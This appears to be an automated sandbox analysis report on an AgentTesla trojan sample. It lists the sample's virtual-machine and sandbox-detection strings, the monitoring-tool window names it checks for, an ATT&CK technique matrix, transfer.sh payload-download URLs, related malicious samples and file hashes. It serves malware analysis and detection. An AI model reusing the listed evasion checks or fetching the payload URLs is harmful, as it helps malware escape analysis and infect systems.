Source: AgentTesla.exe	Binary or memory string: VMWARE
Source: AgentTesla.exe	Binary or memory string: Hyper-V detected
Source: AgentTesla.exe	Binary or memory string: s_vm_wmi_VMware_detection - VMware not detected
Source: AgentTesla.exe	Binary or memory string: Correction - CPUID data block search indicates QEMU detected
Source: AgentTesla.exe	Binary or memory string: CPUID Hyper-V Signature rejected
Source: AgentTesla.exe	Binary or memory string: s_vm_wmi_VMware_detection - VMware detected
Source: AgentTesla.exe	Binary or memory string: WMI checking for VM_WMI_VMWARE
Source: AgentTesla.exe	Binary or memory string: Running GoogleCompute Environment MechanismGoogleCompute Environment Mechanism positve resultGoogleCompute Environment Mechanism negative resultMICROSOFTAZUREPopulating PARALLELS VM AttributesPARALLELSPARALLELSPopulating QEMU VM AttributesQEMUVIRTUALBOXVIRTUALBOXMICROSOFTVIRTUALPCMICROSOFTHYPERVPopulating VMWARE Attributes....VMWAREDESKTOPSERVERVMWAREAttribute Population Done
Source: AgentTesla.exe, 00000000.00000002.380743065.0000000000996000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AgentTesla.exe	Binary or memory string: QEMU Detection negative result
Source: AgentTesla.exe	Binary or memory string: Running QEMU-specific CPUID Detection Mechanism
Source: AgentTesla.exe	Binary or memory string: QEMU-specific CPUID test negative
Source: AgentTesla.exe	Binary or memory string: Populating QEMU VM Attributes
Source: AgentTesla.exe	Binary or memory string: QEMU detected
Source: AgentTesla.exe	Binary or memory string: START_LICENSESTART_LICENSE.lic%s > %sVM_ALLVM_ALLPHYSICALPHYSICALVM_ONLYVM_ONLYVM_ALLVM_ALLVM_ONLYVM_ONLYVMWVMWPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYHYPER-VHYPER-VPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYXENXENPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYQEMUQEMUPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYPARALLELSPARALLELSPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYVIRTUALBOXVIRTUALBOXPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYAMAZONAMAZONPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYGOOGLEGOOGLEPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYAZUREAZUREPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYVPCVPCPHYSICALPHYSICALVM_ALLVM_ALLVM_ONLYVM_ONLYPHYSICALPHYSICALVM_ALLVM_ALLi86_rei86_rei86_sei86_sei86_lsbi86_lsbamd64_reamd64_rex64_sex64_sex64_lsbx64_lsbit64_reit64_reit64_lsbit64_lsbppc_reppc_reppc_seppc_seppc_lsbppc_lsbppc64_reppc64_reppc64_seppc64_seppc64_lsbppc64_lsb%s <> , %d-%[^-]-%dSIGN%s=SIGN%s=NOMORE1460,INTERNET=%s
Source: AgentTesla.exe	Binary or memory string: Running QEMU-specific Vm Detection Mechanism
Source: AgentTesla.exe	Binary or memory string: VMwareVMware
Source: AgentTesla.exe	Binary or memory string: HYPER-V
Source: AgentTesla.exe	Binary or memory string: UNKNOWNVMUNKNOWNVMFailed to create WMI objectSELECT * FROM Win32_NetworkAdapterPNPDeviceIDVMBUS\GuidAzure detected on the following NIC:Error: Cmn Wmi query failedRunning AZURE-specific Vm Detection MechanismAZURE-specific detection positive resultAZURE-specific detection negative resultSELECT * FROM Failed to create WMI objectError: Cmn Wmi query failedWin32_BaseBoardProductVirtual Machines_vm_wmi_hyperv_detection - HyperV detecteds_vm_wmi_hyperv_detection - HyperV not detectedWin32_BIOSSerialNumberVMwares_vm_wmi_VMware_detection - VMware detecteds_vm_wmi_VMware_detection - VMware not detectedFailed to create WMI objectSELECT * FROM Win32_BIOSManufacturerinnotek GmbHSMBIOSBIOSVersionVirtualBoxError: Cmn Wmi query failedFailed to create WMI objectSELECT Name FROM Win32_PROCESSORNameQEMU Virtual CPUError: Cmn Wmi query failedSELECT * FROM Win32_DiskDriveCaptionQEMUModelQEMUError: Cmn Wmi query failedWin32_ComputerSystemManufacturerParallelss_vm_wmi_Parallels_detection - Parallels detected via Manufacturers_vm_wmi_Parallels_detection - Parallels not detected via ManufacturerFailed to create WMI objectSELECT HypervisorPresent FROM Win32_ComputerSystemHypervisorPresents_vm_wmi_HypervisorPresent_detection - HypervisorPresent detectedError: Cmn Wmi query failedWin32_BaseBoardProductVirtual MachineWMI Vm Detection MechanismWMI checking for VM_WMI_HYPERVWMI checking for VM_WMI_VMWAREWMI checking for VM_WMI_VIRTUALBOXWMI checking for VM_WMI_QEMUWMI checking for VM_WMI_PARALLELSWMI checking for VM_FAMILY_UNKNOWNWMI Vm Detection Mechanism positive resultWMI Vm Detection Mechanism negative resultRunning QEMU-specific CPUID Detection MechanismInspecting signatures, displaying non-trivial instances....KVMKVMKVMQEMU detected using cpuid mechanismQEMU-specific CPUID test negativeQEMURunning QEMU-specific Vm Detection MechanismQEMU Detection positive resultQEMU Detection negative resultRunning XEN-specific CPUID Detection MechanismInspecting signatures, displaying non-trivial instances....XenVMMXenVMMXen detected using cpuid mechanismXEN-specific CPUID test negativeRunning XEN-specific Vm Detection MechanismXEN-specific CPUID Detection positive resultXEN-specific CPUID Detection negative resultXENXENAnalyzing signature....XenVMMXenVMMXenVMMXenVMM detectedVMwareVMwareVMwareVMware detectedMicrosoft HvMicrosoft Hv detectedKVMKVMKVMKVM detected but ignoredUnknown hypervisor detectedRunning CPUID Vm Detection MechanismCPUID instruction not implementedCPUID instruction supportedRunning Windows-specific CPUID Detection Mechanism....Obtained signature....Microsoft HvSuccess: Non-Hv hypervisor detectedWindows-specific non-Hv CPUID Detection Mechanism SuccessWindows-specific non-Hv CPUID Detection Mechanism FailedBasic Hypervisor present bit setObtained signature....<empty>Signature recognizedBasic Hypervisor present bit not setCPUID Hypervisor Detection positive resultCPUID Hypervisor Detection negative resultCPUID Vm Detection positive resultCPUID Vm Detection negative r
Source: AgentTesla.exe	Binary or memory string: QEMU detected using cpuid mechanism
Source: AgentTesla.exe	Binary or memory string: QEMU Detection positive result

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\AgentTesla.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\AgentTesla.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\AgentTesla.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\AgentTesla.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AgentTesla.exe PID: 6368, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.AgentTesla.exe.6ec9a88.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AgentTesla.exe.6ec9a88.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AgentTesla.exe PID: 6368, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	11 Process Injection	1 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	32 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AgentTesla.exe	31%	Virustotal		Browse
AgentTesla.exe	44%	ReversingLabs	Win32.Trojan.GenCBL

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.AgentTesla.exe.1310000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/m	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://www.macrovision.com/fnp/2004/11/activation	0%	Virustotal		Browse
http://www.macrovision.com/fnp/2004/11/activation	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.sh/get/jwhuCr/devvvv.txt	false		high
https://transfer.sh/get/iGs052/BASE64.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://169.254.169.254/http://169.254.169.254/latest/meta-datalatest/meta-data/public-ipv4%clatest/m	AgentTesla.exe	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	AgentTesla.exe	false	URL Reputation: safe	unknown
https://transfer.sh	AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.macrovision.com/fnp/2004/11/activation	AgentTesla.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	AgentTesla.exe	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AgentTesla.exe, 00000000.00000002.388115221.0000000005E31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	AgentTesla.exe, 00000000.00000002.393648986.0000000006E39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	AgentTesla.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	AgentTesla.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	588752
Start date:	14.03.2022
Start time:	17:00:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	AgentTesla.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/2@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 23.35.236.56, 23.211.6.115, 80.67.82.211, 80.67.82.235
Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, fs.microsoft.com, store-images.s-microsoft.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:02:20	API Interceptor	1x Sleep call for process: AgentTesla.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	tXDPyCfwcY.exe	Get hash	malicious	Browse	transfer.sh/get/fvp22f/Aiebe.jpg
	4G5k6vDDlx.exe	Get hash	malicious	Browse	transfer.sh/get/a9xgDe/Gudsp.jpg
	81cofLYh1o.exe	Get hash	malicious	Browse	transfer.sh/get/guc4Cl/Mppvcqd.jpg
	SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exe	Get hash	malicious	Browse	transfer.sh/get/uM4ooB/Xvyspuzxq.png
	Hr0Hgb5CWj.exe	Get hash	malicious	Browse	transfer.sh/get/q9wdd6/Mvuizr.log
	3baQS3WUdx.exe	Get hash	malicious	Browse	transfer.sh/get/IJwL7t/Kkvkby.png
	Jnfgs.exe	Get hash	malicious	Browse	transfer.sh/get/SkEyQd/Jnfgs.png
	Cheat_Setup.exe	Get hash	malicious	Browse	transfer.sh/get/6MBXDe/Srueaakv.png
	FCsaYN4YXX.exe	Get hash	malicious	Browse	transfer.sh/get/bwkgO4/Daggl.jpg
	vVh3lBaKu8.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Jaravoi.exe	Get hash	malicious	Browse	transfer.sh/get/Vh2TYt/Yrknyhowz.jpg
	Qxyey.exe	Get hash	malicious	Browse	transfer.sh/get/5WciVO/Qxyey.jpg
	AutoInstall.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	setup.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	r1gnvYRnsz.exe	Get hash	malicious	Browse	transfer.sh/get/Vr8NiB/Sgntfszp.log
	C4TdpMeL4x.exe	Get hash	malicious	Browse	transfer.sh/get/Q2ccFQ/Mruvwuq.jpg
	m28WwC2t8H.exe	Get hash	malicious	Browse	transfer.sh/get/fTXBOF/Sldabyj.png
	EasyCheat.exe	Get hash	malicious	Browse	transfer.sh/get/ittola/Scqrsdtrl.png
	OZ5XkYPXcG.exe	Get hash	malicious	Browse	transfer.sh/get/XN16WS/Psminaz.png
	ORDER 211011A.xlsm	Get hash	malicious	Browse	transfer.sh/get/HyKymv/wordart.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
transfer.sh	https://transfer.sh/get/vaJpNR/pyipHdxl-score.rtf	Get hash	malicious	Browse	144.76.136.153
	EC009800776.exe	Get hash	malicious	Browse	144.76.136.153
	DHL Express Shipping Docx.exe	Get hash	malicious	Browse	144.76.136.153
	Payment Returned.exe	Get hash	malicious	Browse	144.76.136.153
	SWIFT Copy_qdf.exe	Get hash	malicious	Browse	144.76.136.153
	Neue Bestellung.exe	Get hash	malicious	Browse	144.76.136.153
	DHL Express Tracking Number.exe	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.W32.MSIL_Agent.CYD.genEldorado.27686.exe	Get hash	malicious	Browse	144.76.136.153
	TSLpexqK42.exe	Get hash	malicious	Browse	144.76.136.153
	SaXu3fKoNG.exe	Get hash	malicious	Browse	144.76.136.153
	NEW_VOICE_MESSAGE001210.EXE	Get hash	malicious	Browse	144.76.136.153
	110322PAYMENT ADVICE.IMG.EXE	Get hash	malicious	Browse	144.76.136.153
	Tax2020.xll	Get hash	malicious	Browse	144.76.136.153
	DHL Delivery Document.exe	Get hash	malicious	Browse	144.76.136.153
	ORDER0999809.exe	Get hash	malicious	Browse	144.76.136.153
	ATTACHME.EXE	Get hash	malicious	Browse	144.76.136.153
	tXDPyCfwcY.exe	Get hash	malicious	Browse	144.76.136.153
	WIRE_PAYMENT_RETURNED120_VA.EXE	Get hash	malicious	Browse	144.76.136.153
	KVDKGYBAXAKQX_PAYMENT_COPY.VBS	Get hash	malicious	Browse	144.76.136.153
	kTzHVjSreo.exe	Get hash	malicious	Browse	144.76.136.153

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	c04iSMfWfd.dll	Get hash	malicious	Browse	78.47.204.80
	qE7gTdRgEs.dll	Get hash	malicious	Browse	78.47.204.80
	IZ6tnHq5Bc.dll	Get hash	malicious	Browse	78.47.204.80
	4NKpZbdGLg.dll	Get hash	malicious	Browse	78.47.204.80
	ZBR3F6XEkt.dll	Get hash	malicious	Browse	5.9.116.246
	Datei 47446405.xlsm	Get hash	malicious	Browse	78.47.204.80
	AVISO-268.xlsm	Get hash	malicious	Browse	78.47.204.80
	allegati_9.xlsm	Get hash	malicious	Browse	78.47.204.80
	94224UVHQ_46453820.xlsm	Get hash	malicious	Browse	78.47.204.80
	RechnungsDetailsX2022.14.03_1521.xlsm	Get hash	malicious	Browse	5.9.116.246
	nsIsjTDu8X.dll	Get hash	malicious	Browse	5.9.116.246
	LbbXH4Uecv.dll	Get hash	malicious	Browse	78.47.204.80
	2022AV00007340.xlsm	Get hash	malicious	Browse	5.9.116.246
	qGRER3obth2P2UXmSjlPL.dll	Get hash	malicious	Browse	5.9.116.246
	AHxoP6j0rp.dll	Get hash	malicious	Browse	78.47.204.80
	R4ksbAeCc3.dll	Get hash	malicious	Browse	78.47.204.80
	iNKrYBVPz8.dll	Get hash	malicious	Browse	78.47.204.80
	AVISO_300482092.zls.xlsm	Get hash	malicious	Browse	78.47.204.80
	MnyeMRsnn6.dll	Get hash	malicious	Browse	78.47.204.80
	W5YDqaiNfF.dll	Get hash	malicious	Browse	78.47.204.80

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	1afe86f0cc4dab4d6389c4a4dbbed28b57a598d462ada.exe	Get hash	malicious	Browse	144.76.136.153
	parking list details.pdf..exe	Get hash	malicious	Browse	144.76.136.153
	Neon.exe	Get hash	malicious	Browse	144.76.136.153
	https://webmail.webmailser.repl.co/#rbruce@hwlochner.com	Get hash	malicious	Browse	144.76.136.153
	http://dhamp.webuiltideas.com/tom.murphy@aspenleafenergy.com	Get hash	malicious	Browse	144.76.136.153
	MAWB 057-05763984 AWB 057-04914954.exe	Get hash	malicious	Browse	144.76.136.153
	KCR2JIl6tT.exe	Get hash	malicious	Browse	144.76.136.153
	Xwbnutju98765456789.exe	Get hash	malicious	Browse	144.76.136.153
	EC009800776.exe	Get hash	malicious	Browse	144.76.136.153
	bin nn.exe	Get hash	malicious	Browse	144.76.136.153
	Bank Details.exe	Get hash	malicious	Browse	144.76.136.153
	Payment Returned.exe	Get hash	malicious	Browse	144.76.136.153
	remittance details.exe	Get hash	malicious	Browse	144.76.136.153
	https://u25857462.ct.sendgrid.net/ls/click?upn=7xDwQ3ft1Kxf4fyCqKy-2F5OCMLBJPIF5W1NASdIdmCiueU-2BGlicIVYIWixRGtELjueWPTsQvfikpYzXbC-2Bz60xPMpsHPBPePjZuoY6y8P8B4-3D5QiD_jsvxW-2B08pXiJZk1Eut12iR1VqV7PpGybrXAgF-2BP72EoYCex6z58uf0NNmYZr-2FzclAl847e3jc8vVBRFfsvgaxHksNQEs-2F80P9NE7ZnYOGQ9UmYOR0fyDFMS8Yps1MRl5bVHAAeOJG8DpwhwHuxxfvz1uyhTah6iqFNVTGnT67aFBnYbokWj2lb8HPAe1VMgEWHD-2BI5fmwv3S6fbsSeClplEOoAoBpLXIB-2BPUooln2I74slP7cclah0I7b92IBTjEIkfMi96nFBE60fwP3HYVQc8y8SCF9jN8S5H6SVWPZF2uLT-2BmWMCyGYDJfxVDFY6HaJYbFEZPfwHRIYqf0b7OriY1-2BRYmBwbD-2FZwNriQCUE8fWjKWnGyGdGvYgnnAQkHItGiyLk68M32pqOQxf0F9Uh-2Fso6gOy0QrZfK9op3USCjuiBJ8y92JzGgdsXqiL7GILUJiQqwOdj3KQs-2FBd4IzW3eFUYtMas1gQg2AsZ2ShdSCFAg7X3oGfIpgsyqNX9r4DOuESrpPhatEetGV-2BWoYdCpJvss-2BSEqqOcQ2XZ8INhH-2BoAIeK-2Bd1DIVt6cfAzzfkwfJov-2F189sATJXK7sWtQl42n78MzalZpJxvopQPd1dZwm1xmUn2xuAx7JjxiHM156Nb7VKpb7v4UvxiVguFBcgzdwSnIQcJtXRyiYWp6g9-2BW6OQnz1cvqe8uMbd0R4Fjm9tT25YJJoHdI1jR1msA9GgFyhSgv57m2jPCL51Xg6OgxI9SnXVSia6PZv6j4ae0LjaLB1p6RYCfLaqbWYueafJzkVUL774Ty1icDepr4SeZvQXthXu4cBR6UT4MklGLF3zr0qeSFPa0dtA87IQJRpiZleAsuqYrAB-2FwsCXdZ7Kg4cNGR-2BnG1cUJmARmolRH	Get hash	malicious	Browse	144.76.136.153
	2babbb.exe	Get hash	malicious	Browse	144.76.136.153
	SWIFT Copy_qdf.exe	Get hash	malicious	Browse	144.76.136.153
	Neue Bestellung.exe	Get hash	malicious	Browse	144.76.136.153
	SzZUGntg6K.exe	Get hash	malicious	Browse	144.76.136.153
	DHL Express Tracking Number.exe	Get hash	malicious	Browse	144.76.136.153
	XQ25J7n59z.exe	Get hash	malicious	Browse	144.76.136.153

Process:	C:\Users\user\Desktop\AgentTesla.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:4BES8Wyn:4B4Wyn
MD5:	A63AE2B4C597F899C16A571BDD4B3862
SHA1:	52289B6B0A243664D523D7E6ED5DFF597AD4AE73
SHA-256:	1AE934E431A616E6E183A17EEA411C584E59E60B157E298862516A11999BE020
SHA-512:	1B5FEFC99CD9EACC787F2E874C13AD9733C3274DE5E05A6EF9EAEDEAD3EBAA5974B9A887785274498C63476F3D77009BE2B8B63CD402489F156630A7BD693D9B
Malicious:	false
Reputation:	low
Preview:	d.dn.w...k7H.V.^

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AgentTesla.exe.log

Download File

Process:	C:\Users\user\Desktop\AgentTesla.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	944
Entropy (8bit):	5.364592299424785
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84j:MxHKXwYHKhQnoPtHoxHhAHKzvKvj
MD5:	E0DA8EEA094355AF7E5DABCD9FE68706
SHA1:	FBFC0A86297BDFB11B96F78CFAFE67DCDF610B72
SHA-256:	A2D206F393A2CC97D57198A77FE1CF167CB2881B10C7032BB83B4D6BCD3AD24E
SHA-512:	9B8633118D5F3CBAE1F66CD6538ED810B8995A764349595D6250755BEBB21A02DBC66149D92AF3E2E584CE1471D7B522F3021C1E9BA92D75507283F21BBA8338
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.660303287732489
TrID:	Win32 Executable (generic) a (10002005/4) 99.10% InstallShield setup (43055/19) 0.43% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	AgentTesla.exe
File size:	7255264
MD5:	81448798cca71e2b8bce354afcf098b4
SHA1:	29c1fbbaad4d5b988b570741b733120801f7ebcc
SHA256:	c92c2d345803369fe8d343b1c894c1dc82e0c8b855c83d3cdb07c179e108aa78
SHA512:	b837e64b20669f892fb9ee1da48d97916ebaf65b900d8d8164fdb3a18a547b2ea6c92a5175939b79d6a67a19b3660000e51e84ed70d30561ac5c0a03805dd7be
SSDEEP:	98304:0KgT8+7CuQJKJoDgnggMMCFnUudG2CSLOG5ADU9Z8RNCjjTGFGzPhG0:sT8+7h/WMnggMbxUudB3A8INCzGeJ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:..b.....................v%.....X@... ... ....@.. ................................n...`................................

File Icon


Icon Hash:	b07064e6c6c69c8e

Static PE Info

General

Entrypoint:	0xd44058
Entrypoint Section:	.boot
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, HIGH_ENTROPY_VA
Time Stamp:	0x622EEB3A [Mon Mar 14 07:14:02 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4328f7206db519cd4e82283211d98e83

Authenticode Signature

Signature Valid:	false
